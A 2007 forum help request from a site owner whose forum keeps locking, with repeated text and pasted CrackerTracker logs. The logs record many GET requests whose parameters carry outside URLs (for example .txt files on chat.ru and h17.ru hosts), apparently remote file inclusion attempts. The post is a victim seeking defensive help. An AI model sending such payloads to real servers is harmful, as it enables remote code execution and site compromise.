2007-11-24, 01:18 PM
Hello Friends,
My problem is that sometimes my forum is locked. I close it from ftp and wait a little bit, then reset the server; so it is alright. I talked about this problem with my host company and learn that it is because someone attacks the forum or the overuse of SQL of MySQL, then this locks the forum. That is why I install Cracker Tracker with adding those files:
When I look at “who is Online” part and want to know where the visitors are, it says they are in the Unknown zone, then when I click on them to know where they are, the address below is shown.
I guess those two cases are not the coincidence. They are the causes of my problem. If it is so, what do you advice me to do?
Thanks all
logfile_debug_mode.txt (the content of the file is given below)
logfile_injects.txt (the content of the file is given below)
My problem is that sometimes my forum is locked. I close it from ftp and wait a little bit, then reset the server; so it is alright. I talked about this problem with my host company and learn that it is because someone attacks the forum or the overuse of SQL of MySQL, then this locks the forum. That is why I install Cracker Tracker with adding those files:
When I look at “who is Online” part and want to know where the visitors are, it says they are in the Unknown zone, then when I click on them to know where they are, the address below is shown.
I guess those two cases are not the coincidence. They are the causes of my problem. If it is so, what do you advice me to do?
Thanks all
logfile_debug_mode.txt (the content of the file is given below)
Request-Method: GET
Query String: tid=http://amygirl.chat.ru/images/image.txt?
# EoM
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Script-Filename: /forum/printthread.php
----------------
Request-Method: GET
Query String: tid=http://amygirl.chat.ru/images/image.txt?
# EoM
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Script-Filename: /forum/printthread.php
----------------
Request-Method: GET
Query String: tid=http%3a%2f%2fwww.parasolmusic.com%2fpanel%2fphpmyadmin%2fimages%2f.data%2fcihalil%2fhabin%2f
# EoM
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Script-Filename: /forum/showthread.php
----------------
Request-Method: GET
Query String: mode=http://amymusicgirl.h17.ru/mysong.txt?
# EoM
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Script-Filename: /forum/member.php
----------------
Request-Method: GET
Query String: action=http://amymusicgirl.h17.ru/mysong.txt?
# EoM
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Script-Filename: /forum/forumdisplay.php
----------------
Request-Method: GET
Query String: fid=http://amymusicgirl.h17.ru/mysong.txt?
# EoM
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Script-Filename: /forum/forumdisplay.php
----------------
Request-Method: GET
Query String: fid=http://amymusicgirl.h17.ru/mysong.txt?
# EoM
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Script-Filename: /forum/forumdisplay.php
----------------
Request-Method: GET
Query String: fid=http://amymusicgirl.h17.ru/mysong.txt?
# EoM
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Script-Filename: /forum/forumdisplay.php
----------------
Request-Method: GET
Query String: fid=http://amymusicgirl.h17.ru/mysong.txt?
# EoM
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Script-Filename: /forum/showthread.php
----------------
Request-Method: GET
Query String: tid=http://amymusicgirl.h17.ru/mysong.txt?
# EoM
logfile_injects.txt (the content of the file is given below)
CrackerTracker - A Protection System from http://www.cback.de
2007-11-22, 15:26:24, 1195745184, 70.52.96.200, tid=http:amygirl.chat.ruimagesimage.txt?, Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)
2007-11-22, 15:37:06, 1195745826, 70.52.96.200, tid=http:amygirl.chat.ruimagesimage.txt?, Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)
2007-11-22, 18:55:01, 1195757701, 217.144.201.107, tid=http%3a%2f%2fwww.parasolmusic.com%2fpanel%2fphpmyadmin%2fimages%2f.data%2fcihalil%2fhabin%2f, Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
2007-11-24, 04:22:52, 1195878172, 69.159.161.19, mode=http:amymusicgirl.h17.rumysong.txt?, Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)
2007-11-24, 05:36:21, 1195882581, 70.52.219.158, action=http:amymusicgirl.h17.rumysong.txt?, Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)
2007-11-24, 06:04:34, 1195884274, 207.112.41.3, fid=http:amymusicgirl.h17.rumysong.txt?, Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)
2007-11-24, 06:41:10, 1195886470, 67.100.55.223, fid=http:amymusicgirl.h17.rumysong.txt?, Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)
2007-11-24, 06:41:53, 1195886513, 67.100.55.223, fid=http:amymusicgirl.h17.rumysong.txt?, Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)
2007-11-24, 07:22:32, 1195888952, 65.93.182.201, fid=http:amymusicgirl.h17.rumysong.txt?, Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)
2007-11-24, 08:12:52, 1195891972, 78.146.199.238, tid=http:amymusicgirl.h17.rumysong.txt?, Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)